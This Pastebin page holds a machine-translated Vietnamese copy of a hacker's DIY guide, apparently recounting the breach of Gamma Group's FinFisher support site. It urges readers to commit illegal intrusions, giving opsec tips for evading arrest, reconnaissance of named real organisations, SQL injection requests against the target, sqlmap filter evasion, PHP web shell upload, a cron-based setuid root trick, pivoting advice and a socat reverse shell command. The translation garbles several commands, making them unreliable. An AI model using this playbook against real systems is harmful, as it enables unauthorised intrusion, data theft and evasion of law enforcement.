Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _ _ ____ _ _
- | | | | __ ___ _ | | __ | __) __ _ ___ | | _ | |
- | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
- | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
- | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
- Hướng dẫn tự làm cho những người không đủ kiên nhẫn để chờ đợi cho người tố cáo
- - [1] - Giới thiệu
- Tôi không viết bài này để khoe khoang về những gì tôi có 31.337 h4x0r và những gì m4d sk1llz
- nó đã 0wn Gamma. Tôi viết thư này để làm sáng tỏ hacking, để hiển thị như thế nào đơn giản
- đó là, và để hy vọng thông tin và truyền cảm hứng cho bạn để đi ra ngoài và hack shit. Nếu bạn
- không có kinh nghiệm với lập trình hay hack, một số văn bản dưới sức
- trông giống như một ngoại ngữ. Kiểm tra phần tài nguyên ở cuối để giúp bạn
- bắt đầu. Và tôi tin tưởng, một khi bạn đã học được những điều cơ bản bạn sẽ nhận ra điều này
- thực sự là dễ dàng hơn nộp đơn yêu cầu FOIA.
- - [2] - Giữ an toàn
- Điều này là bất hợp pháp, vì vậy bạn sẽ cần phải có biện pháp phòng ngừa cơ bản:
- 1) Thực hiện một khối lượng mã hóa ẩn với TrueCrypt 7.1a [0]
- 2) Bên trong khối lượng mã hóa cài đặt Whonix [1]
- 3) (bắt buộc) Trong khi chỉ có tất cả mọi thứ đi qua Tor nhờ Whonix là
- có lẽ là đủ, nó tốt hơn để không sử dụng một kết nối internet kết nối
- tên hoặc địa chỉ của bạn. Một cantenna, aircrack, và Reaver có thể có ích
- ở đây.
- [0] https://truecrypt.ch/downloads/
- [1] https://www.whonix.org/wiki/Download#Install_Whonix
- Miễn là bạn theo nghĩa thông thường như không bao giờ làm bất cứ điều gì liên quan hack
- ngoài Whonix, không bao giờ làm bất cứ việc sử dụng máy tính bình thường của bạn bên trong Whonix,
- không bao giờ đề cập đến bất kỳ thông tin về cuộc sống thực của bạn khi nói chuyện với khác
- tin tặc, và không bao giờ khoe khoang về khai thác bất hợp pháp hacking của bạn để bạn bè trong thời gian thực
- cuộc sống, sau đó bạn có khá nhiều có thể làm bất cứ điều gì bạn muốn mà không sợ bị v &.
- Chú ý: Tôi không khuyên thực sự hack trực tiếp trên Tor. Trong khi Tor là có thể sử dụng
- đối với một số thứ như trình duyệt web, khi nói đến việc sử dụng công cụ hack như
- nmap, sqlmap, và Nikto rằng đang làm cho hàng ngàn yêu cầu, họ sẽ chạy
- rất chậm hơn Tor. Chưa kể rằng bạn sẽ muốn có một địa chỉ IP công cộng
- nhận được kết nối trở lại vỏ. Tôi khuyên bạn nên sử dụng máy chủ bạn đã bị tấn công hoặc một VPS
- thanh toán bằng Bitcoin để hack từ. Bằng cách đó chỉ có giao diện văn bản băng thông thấp
- giữa bạn và máy chủ kết thúc Tor. Tất cả các lệnh bạn đang chạy sẽ
- phải mục tiêu của bạn một kết nối nhanh chóng tốt đẹp.
- - [3] - Lập bản đồ ra các mục tiêu
- Về cơ bản tôi chỉ cần liên tục sử dụng khốc liệt [0], tra cứu whois trên địa chỉ IP và
- tên miền, và tra cứu whois ngược lại để tìm tất cả không gian địa chỉ IP và tên miền
- tên gắn liền với một tổ chức.
- [0] http://ha.ckers.org/fierce/
- Đối với một ví dụ, chúng ta hãy Blackwater. Chúng tôi bắt đầu biết trang chủ là
- academi.com. Chạy fierce.pl -dns academi.com chúng ta tìm thấy các tên miền phụ:
- 67.238.84.228 email.academi.com
- 67.238.84.242 extranet.academi.com
- 67.238.84.240 mail.academi.com
- 67.238.84.230 secure.academi.com
- 67.238.84.227 vault.academi.com
- 54.243.51.249 www.academi.com
- Bây giờ chúng ta làm tra cứu whois và tìm thấy những trang chủ của www.academi.com được lưu trữ trên
- Amazon Web Service, trong khi các khu công nghiệp khác trong phạm vi:
- NetRange: 67.238.84.224 - 67.238.84.255
- CIDR: 67.238.84.224/27
- CustName: Blackwater USA
- Địa chỉ: 850 Puddin Ridge Rd
- Làm một tra cứu whois trên academi.com cho thấy nó cũng đăng ký cùng
- địa chỉ, vì vậy chúng tôi sẽ sử dụng như là một chuỗi tìm kiếm với cho whois ngược
- tra cứu. Theo như tôi biết tất cả các đảo ngược whois chi phí dịch vụ tra cứu thực tế
- tiền bạc, vì vậy tôi chỉ lừa với google:
- "850 Puddin Ridge Rd" inurl: địa chỉ IP-tra cứu
- "850 Puddin Ridge Rd" inurl: domaintools
- Bây giờ chạy -range fierce.pl trên dãy IP bạn tìm thấy để tra cứu tên dns, và
- fierce.pl -dns trên các tên miền để tìm các tên miền phụ và địa chỉ IP. Làm nhiều hơn nữa
- tra cứu whois và lặp lại quá trình này cho đến khi bạn đã tìm thấy tất cả mọi thứ.
- Ngoài ra chỉ cần google tổ chức và duyệt xung quanh trang web của mình. Ví dụ trên
- academi.com chúng tôi tìm thấy các liên kết đến một cổng thông tin nghề nghiệp, một cửa hàng trực tuyến, và một nhân viên
- trang tài nguyên, vì vậy bây giờ chúng tôi có một số chi tiết:
- 54.236.143.203 careers.academi.com
- 67.132.195.12 academiproshop.com
- 67.238.84.236 te.academi.com
- 67.238.84.238 property.academi.com
- 67.238.84.241 teams.academi.com
- Nếu bạn lặp lại tra cứu whois và như vậy bạn sẽ thấy dường như academiproshop.com
- không được tổ chức hoặc được duy trì bởi Blackwater, do gãi đó ra khỏi danh sách
- khu công nghiệp thú vị / lĩnh vực.
- Trong trường hợp của FinFisher những gì đã dẫn tôi đến dễ bị tổn thương finsupport.finfisher.com
- chỉ đơn giản là một domain của finfisher.com mà tìm thấy nó đăng ký tên
- "FinFisher GmbH". Google:
- "FinFisher GmbH" inurl: domaintools
- tìm thấy gamma-international.de, mà chuyển hướng đến finsupport.finfisher.com
- ... Vì vậy bây giờ bạn đã có một số ý tưởng làm thế nào tôi vạch ra một mục tiêu.
- Điều này thực sự là một trong những phần quan trọng nhất, là cuộc tấn công lớn hơn
- bề mặt mà bạn có thể vạch ra, dễ dàng hơn nó sẽ được để tìm thấy một lỗ
- ở đâu đó trong nó.
- - [4] - Quét & Khai thác
- Quét tất cả các dãy IP mà bạn tìm thấy với nmap để tìm tất cả các dịch vụ đang chạy. Ngoài
- từ một cổng quét chuẩn, quét SNMP là bị đánh giá thấp.
- Bây giờ cho mỗi dịch vụ mà bạn tìm thấy đang chạy:
- 1) Có phải phơi bày một cái gì đó nó không nên? Đôi khi các công ty sẽ có các dịch vụ
- chạy mà không yêu cầu xác thực và chỉ cho rằng đó là an toàn vì url
- hoặc IP để truy cập nó không phải là công cộng. Có lẽ quyết liệt tìm thấy một git tên miền phụ và bạn có thể
- đi đến git.companyname.come / gitweb / và duyệt mã nguồn của họ.
- 2) Có phải khủng khiếp sai? Có thể họ có một máy chủ FTP cho phép
- vô danh đọc hoặc viết truy cập vào một thư mục quan trọng. Có thể họ có một
- máy chủ cơ sở dữ liệu với một mật khẩu quản trị trống (lol Stratfor). Có thể nhúng
- thiết bị (hộp VOIP, IP Camera, thiết bị định tuyến vv) đang sử dụng của nhà sản xuất
- mật khẩu mặc định.
- 3) là nó chạy một phiên bản cũ của phần mềm dễ bị tổn thương đến một công khai thác?
- Máy chủ web xứng đáng với thể loại của mình. Đối với bất kỳ máy chủ web, bao gồm cả những nmap
- thường sẽ tìm thấy đang chạy trên cổng không chuẩn, tôi thường:
- 1) Duyệt chúng. Đặc biệt là trên các tên miền phụ mà phát hiện khốc liệt mà không có mục đích
- cho công chúng xem như test.company.com hoặc dev.company.com bạn thường sẽ tìm thấy
- thứ thú vị khác chỉ bằng cách nhìn vào họ.
- 2) Run Nikto [0]. Điều này sẽ kiểm tra những thứ như máy chủ web / svn /,
- máy chủ web / sao lưu /, máy chủ web / phpinfo.php, và phổ biến một vài ngàn khác
- sai lầm và cấu hình sai.
- 3) Xác định các phần mềm đang được sử dụng trên trang web. WhatWeb rất hữu ích [1]
- 4) Tùy thuộc vào phần mềm trang web đang hoạt động, sử dụng các công cụ cụ thể hơn
- như wpscan [2], [3] CMS-Explorer, và Joomscan [4].
- Trước tiên hãy thử mà đối với tất cả các dịch vụ để xem nếu có có sai,
- công chúng biết đến tổn thương, hoặc cách khác dễ dàng. Nếu không, đó là thời gian để di chuyển
- vào việc tìm kiếm một lỗ hổng mới:
- 5) các ứng dụng web được mã hóa tùy chỉnh là mảnh đất màu mỡ hơn cho lỗi lớn hơn so với sử dụng rộng rãi
- các dự án, vì vậy hãy thử những người đầu tiên. Tôi sử dụng ZAP [5], và một số sự kết hợp của nó
- kiểm tra tự động cùng với tay chĩa ra xung quanh với sự giúp đỡ của nó
- chặn proxy.
- 6) Đối với phần mềm không tùy chỉnh họ đang chạy, có được một bản sao để xem xét. Nếu đó là
- phần mềm miễn phí bạn chỉ có thể tải về nó. Nếu đó là bạn có thể sở hữu thường
- cướp nó. Nếu đó là độc quyền và đủ tối nghĩa rằng bạn không thể cướp nó, bạn
- có thể mua nó (lame) hoặc tìm các trang web khác đang chạy cùng một phần mềm sử dụng google,
- tìm thấy một trong đó là dễ dàng hơn để hack, và nhận được một bản sao từ họ.
- [0] http://www.cirt.net/nikto2
- [1] http://www.morningstarsecurity.com/research/whatweb
- [2] http://wpscan.org/
- [3] https://code.google.com/p/cms-explorer/
- [4] http://sourceforge.net/projects/joomscan/
- [5] https://code.google.com/p/zaproxy/
- Đối với finsupport.finfisher.com quá trình này:
- * Bắt đầu Nikto chạy ở chế độ nền.
- * Truy cập vào trang web. Xem gì, nhưng một trang đăng nhập. Nhanh chóng kiểm tra sqli trong
- mẫu đăng nhập.
- * Xem nếu WhatWeb biết bất cứ điều gì về những phần mềm trang web đang chạy.
- * WhatWeb không nhận ra nó, vì vậy câu hỏi tiếp theo, tôi muốn được trả lời là nếu điều này
- là một trang web tùy chỉnh bằng Gamma, hoặc nếu có những trang web khác sử dụng cùng
- phần mềm.
- * Tôi xem mã nguồn trang web để tìm một URL tôi có thể tìm kiếm trên (không phải là index.php
- chính xác duy nhất cho phần mềm này). Tôi chọn Scripts / scripts.js.php, và google:
- allinurl: "Scripts / scripts.js.php"
- * Tôi thấy có một số ít các trang web khác sử dụng cùng một phần mềm, tất cả đều được mã hóa bởi
- cùng công ty webdesign nhỏ. Có vẻ như mỗi trang web được mã hóa tùy chỉnh nhưng
- họ chia sẻ rất nhiều mã. Vì vậy, tôi hack một vài trong số họ để có được một bộ sưu tập
- mã được viết bởi các công ty webdesign.
- Tại thời điểm này tôi có thể thấy các câu chuyện tin tức rằng các nhà báo sẽ viết để trống
- lên quan điểm: "Trong một cuộc tấn công nhiều bước phức tạp, tin tặc đầu tiên thỏa hiệp một
- công ty thiết kế web để có được dữ liệu bí mật mà có thể hỗ trợ họ trong
- Nhóm tấn công Gamma ... "
- Nhưng nó thực sự khá dễ dàng, thực hiện hầu như trên máy lái tự động khi bạn nhận được hang của
- nó. Phải mất tất cả của một vài phút để:
- * Google allinurl: "Scripts / scripts.js.php" và tìm các trang web khác
- * Chú ý tất cả họ đang tiêm sql trong tham số url đầu tiên tôi cố gắng.
- * Nhận ra họ đang chạy Apache ModSecurity vì vậy tôi cần phải sử dụng sqlmap [0] với
- tùy chọn --tamper = 'giả mạo / modsecurityversioned.py'
- * Có được các thông tin đăng nhập quản trị, đăng nhập và tải lên một vỏ php [1] (các
- kiểm tra phần mở rộng tập tin cho phép được thực hiện phía khách hàng trong javascript), và
- tải về mã nguồn của trang web.
- [0] http://sqlmap.org/
- [1] https://epinna.github.io/Weevely/
- Nhìn qua các mã nguồn mà họ cũng có thể đặt tên cho nó chết tiệt dễ bị tổn thương
- Web App v2 [0]. Nó có sqli, LFI, kiểm tra tập tin tải lên được thực hiện phía khách hàng trong
- javascript, và nếu bạn không được thẩm định trang quản trị chỉ gửi cho bạn trở lại
- trang đăng nhập với một tiêu đề Vị trí, nhưng bạn có thể ủy quyền ngăn chặn của bạn
- lọc các tiêu đề từ ra ngoài và truy cập nó tốt.
- [0] http://www.dvwa.co.uk/
- Quay trở lại trên các trang web finsupport, lợi nhuận admin / BackOffice / trang
- 403 Forbidden, và tôi đang gặp một số vấn đề với LFI, vì vậy tôi chuyển sang sử dụng các
- sqli (đó là tốt đẹp để có một chục tùy chọn để lựa chọn). Các trang web khác do
- nhà thiết kế web đều có một print.php tiêm, vì vậy một số yêu cầu nhanh chóng:
- https://finsupport.finfisher.com/GGI/Home/print.php?id=1 và 1 = 1
- https://finsupport.finfisher.com/GGI/Home/print.php?id=1 và 2 = 1
- tiết lộ rằng finsupport cũng đã print.php và nó là tiêm. Và đó là
- cơ sở dữ liệu quản trị! Đối với MySQL này có nghĩa là bạn có thể đọc và ghi các file. Hóa ra
- trang web đã magicquotes kích hoạt, vì vậy tôi không thể sử dụng INTO OUTFILE để ghi tập tin.
- Nhưng tôi có thể sử dụng một kịch bản ngắn có sử dụng sqlmap --file đọc để có được những nguồn php
- cho một URL, và một trang web yêu cầu bình thường để có được HTML, và sau đó tìm thấy tập tin
- bao gồm hoặc được yêu cầu trong nguồn php, và tìm kiếm các tập tin php liên kết trong HTML,
- đệ quy tải về mã nguồn cho toàn bộ trang web.
- Nhìn qua các nguồn, tôi thấy khách hàng có thể đính kèm một tập tin để hỗ trợ họ
- vé, và không có kiểm tra trên phần mở rộng tập tin. Vì vậy, tôi chọn một tên người dùng và
- mật khẩu ra khỏi cơ sở dữ liệu khách hàng, tạo ra một yêu cầu hỗ trợ với một vỏ php
- đính kèm, và tôi đang ở trong!
- - [5] - (thất bại tại) Leo thang
- ___________
- <Đã r00t? >
- -----------
- \ ^ __ ^
- \ (Oo) \ _______
- (__) \) \ / \
- || ---- W |
- || ||
- ^^^^^^^^^^^^^^^^
- Gốc trên 50% các máy chủ Linux bạn gặp trong tự nhiên với hai kịch bản dễ dàng,
- [0] Linux_Exploit_Suggester, và Unix-privesc kiểm tra [1].
- [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
- [1] https://code.google.com/p/unix-privesc-check/
- finsupport được chạy phiên bản mới nhất của Debian với không có khai thác gốc địa phương,
- nhưng unix-privesc kiểm tra trả lại:
- Chú ý: /etc/cron.hourly/mgmtlicensestatus được điều hành bởi cron như là người chủ. Người sử dụng
- www-dữ liệu có thể viết thư cho /etc/cron.hourly/mgmtlicensestatus
- Chú ý: /etc/cron.hourly/webalizer được điều hành bởi cron như là người chủ. Người sử dụng www-data
- có thể viết thư cho /etc/cron.hourly/webalizer
- vì vậy tôi thêm vào /etc/cron.hourly/webalizer:
- gốc chown: root / path / to / my_setuid_shell
- chmod 04.755 / path / to / my_setuid_shell
- chờ đợi một giờ, và .... không có gì. Chỉ ra rằng trong khi quá trình cron đang chạy
- nó dường như không phải là thực sự chạy công việc cron. Nhìn vào Webalizer
- thư mục cho thấy nó không cập nhật các số liệu thống kê tháng trước. Rõ ràng sau khi
- cập nhật định kỳ múi giờ đôi khi sẽ chạy ở thời điểm sai lầm hoặc đôi khi không
- chạy ở tất cả và bạn cần phải khởi động lại cron sau khi thay đổi múi giờ. ls-l
- / Etc / localtime hiển thị múi giờ đã được cập nhật ngày 06 tháng 6, các Webalizer thời
- ngừng ghi số liệu thống kê, do đó có thể là vấn đề. Ở mức nào, chỉ
- Điều này không có gì là máy chủ lưu trữ các trang web, vì vậy tôi đã có thể truy cập
- tất cả mọi thứ thú vị trên nó. Gốc sẽ không nhận được nhiều bất cứ điều gì mới, vì vậy tôi di chuyển
- vào phần còn lại của mạng.
- - [6] - Xoay vòng
- Bước tiếp theo là để nhìn xung quanh mạng nội bộ của hộp bạn bị tấn công. Điều này
- là khá nhiều giống như quét đầu tiên & Khai thác bước, ngoại trừ
- từ phía sau các bức tường lửa nhiều dịch vụ thú vị hơn sẽ được tiếp xúc. Một
- tarball chứa một bản sao liên kết tĩnh của nmap và tất cả các kịch bản của mình mà bạn
- có thể tải lên và chạy trên bất kỳ hộp là rất hữu ích cho việc này. * Các nfs- khác nhau và
- đặc biệt là smb- * kịch bản có nmap sẽ vô cùng hữu ích.
- Điều thú vị duy nhất tôi có thể nhận được trên mạng nội bộ finsupport là một
- máy chủ web phục vụ lên một thư mục có tên 'qateam' có chứa phần mềm độc hại di động của họ.
- - [7] - Have Fun
- Một khi bạn đang ở trong mạng lưới của họ, niềm vui thực sự bắt đầu. Chỉ cần sử dụng trí tưởng tượng của bạn.
- Trong khi tôi có tựa đề này hướng dẫn cho người tố cáo Wannabe, không có lý do để
- giới hạn mình để rò rỉ các tài liệu. Kế hoạch ban đầu của tôi là:
- 1) Hack Gamma và có được một bản sao của phần mềm máy chủ FinSpy
- 2) Tìm lỗ hổng trong máy chủ FinSpy.
- 3) Quét internet cho, và hack, tất cả các FinSpy C & C server.
- 4) Xác định các nhóm chạy chúng.
- 5) Sử dụng máy chủ C & C để tải lên và chạy một chương trình trên tất cả các mục tiêu nói với họ
- người đã làm gián điệp cho chúng.
- 6) Sử dụng máy chủ C & C để gỡ bỏ cài đặt FinFisher trên tất cả các mục tiêu.
- 7) Tham gia vào cựu C & C server vào một botnet để DDoS Gamma Group.
- Đó là chỉ sau khi không để hack đầy đủ Gamma và kết thúc với một số
- tài liệu thú vị nhưng không có bản sao của phần mềm máy chủ FinSpy mà tôi đã phải
- thực hiện do có kế hoạch sao lưu lulzy ít rò rỉ công cụ của họ, trong khi
- chế giễu họ trên twitter.
- Điểm GPU của bạn tại FinSpy-PC + Điện thoại di động-2012-07-12-Final.zip và crack mật khẩu
- đã để tôi có thể chuyển sang bước 2!
- - [8] - Phương pháp khác
- Phương pháp chung tôi nêu ở trên quét, tìm các lỗ hổng, và khai thác
- chỉ là một cách để hack, có lẽ phù hợp hơn với những người có một nền tảng trong
- lập trình. Không có một cách đúng đắn, và bất kỳ phương pháp làm việc tốt như
- bất kỳ khác. Các cách khác chính mà tôi sẽ nêu mà không đi vào chi tiết là:
- 1) Khai thác trong browers web, java, flash, hoặc microsoft office, kết hợp với
- gửi email cho nhân viên với một thông điệp có sức thuyết phục để có được chúng để mở liên kết hoặc
- tập tin đính kèm, hoặc hack một trang web thường xuyên của các nhân viên và thêm các
- trình duyệt / java / flash khai thác đó.
- Đây là phương pháp được sử dụng bởi hầu hết các chính phủ nhóm hack, nhưng bạn không
- cần phải là một chính phủ với hàng triệu để chi tiêu cho nghiên cứu 0day hoặc đăng ký
- để FinSploit hoặc VUPEN để kéo nó đi. Bạn có thể có được một chất lượng Nga khai thác bộ
- cho một vài ngàn, và truy cập để thuê một cho ít hơn nhiều. Ngoài ra còn có
- Metasploit autopwn trình duyệt, nhưng có thể bạn sẽ có may mắn hơn không có
- khai thác và giả đèn flash cập nhật nhanh chóng.
- 2) Lợi dụng thực tế mà mọi người là tốt đẹp, tin tưởng, và hữu ích 95%
- thời gian.
- Ngành công nghiệp infosec phát minh ra một thuật ngữ để làm âm thanh như một số loại
- khoa học: "Kỹ thuật Xã hội". Đây có lẽ là con đường để đi nếu bạn không biết
- quá nhiều về máy tính, và nó thực sự là tất cả những gì cần phải là một thành công
- Hacker [0].
- [0] https://www.youtube.com/watch?v=DB6ywr9fngU
- - [9] - Tài nguyên
- Liên kết:
- * Https://www.pentesterlab.com/exercises/
- * Http://overthewire.org/wargames/
- * Http://www.hackthissite.org/
- * Http://smashthestack.org/
- * Http://www.win.tue.nl/~aeb/linux/hh/hh.html
- * Http://www.phrack.com/
- * Http://pen-testing.sans.org/blog/2012/04/26/got-Meterpreter-pivot
- * Http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
- * Https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
- * Https://www.netspi.com/blog/entryid/140/resources-cho-vọng thấm-xét nghiệm
- (Tất cả các bài đăng trên blog khác của ông là quá lớn)
- * Https://www.corelan.be/ (bắt đầu khai thác văn bản hướng dẫn phần 1)
- * Http://websec.wordpress.com/2010/02/22/exploiting-php-file-đưa-overview/
- Một mẹo nó lá ra là trên hầu hết các hệ thống bản ghi truy cập apache là
- có thể đọc được chỉ bởi root, nhưng bạn vẫn có thể bao gồm từ / proc / self / fd / 10
- bất cứ điều gì fd apache mở nó như là. Nó cũng sẽ hữu ích hơn nếu nó được đề cập
- những gì phiên bản của php các thủ đoạn khác nhau đã được cố định.
- * Http://www.dest-unreach.org/socat/
- Lấy vỏ ngược lại có thể sử dụng một bản sao liên kết tĩnh của socat để thả trên
- mục tiêu của bạn và:
- mục tiêu $ socat exec: 'bash -li, pty, stderr, setsid, SIGINT, lành mạnh tcp-nghe: portnum
- tổ chức $ socat file: `tty`, nguyên liệu, tiếng vang = 0 tcp kết nối: localhost: portnum
- Nó cũng hữu ích cho việc thiết lập trụ kỳ lạ và tất cả các loại công cụ khác.
- Sách:
- * Sổ tay Các ứng dụng Web của Hacker
- * Hacking: The Art of khai thác
- * Cơ sở dữ liệu Sổ tay Hacker của
- * Nghệ thuật Đánh giá phần mềm bảo mật
- * A Bug Diary Hunter
- * Ngầm: Tales of Hacking, điên rồ, và Obsession trên Electronic Frontier
- * TCP / IP Illustrated
- Ngoài các công cụ hack cụ thể hầu như bất cứ điều gì hữu ích cho hệ thống
- quản trị để thiết lập và điều hành mạng cũng sẽ hữu ích cho
- khám phá chúng. Điều này bao gồm sự quen thuộc với các cửa sổ nhắc lệnh và Unix
- vỏ, kỹ năng kịch bản cơ bản, kiến thức về LDAP, Kerberos, hoạt động thư mục,
- mạng, vv
- - [10] - Outro
- Bạn sẽ nhận thấy một số âm thanh này chính xác như những gì Gamma đang làm. Hacking là một
- công cụ. Nó không bán các công cụ hack mà làm cho Gamma ác. Đó là người của họ
- khách hàng đang nhắm mục tiêu và với mục đích gì mà làm cho họ xấu xa. Đó không phải là
- để nói rằng công cụ này là vốn trung lập. Hacking là một công cụ tấn công. Trong
- cùng một cách mà chiến tranh du kích làm cho nó khó khăn hơn để chiếm một quốc gia, bất cứ khi nào
- nó rẻ hơn để tấn công hơn để bảo vệ nó khó hơn để duy trì bất hợp pháp
- quyền hạn và bất bình đẳng. Vì vậy, tôi đã viết này để cố gắng làm cho hacker dễ dàng hơn và nhiều hơn nữa
- truy cập. Và tôi muốn chỉ ra rằng Tập đoàn Gamma hack thực sự là không có gì
- ưa thích, sqli chỉ tiêu chuẩn, và rằng bạn không có khả năng đi ra ngoài và mất
- hành động tương tự.
- Đoàn kết để tất cả mọi người ở Gaza, Israel-lương tâm chống đối, Chelsea
- Manning, Jeremy Hammond, Peter Sunde, anakata, và bỏ tù tất cả khác
- hacker, bất đồng chính kiến, và tội phạm!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement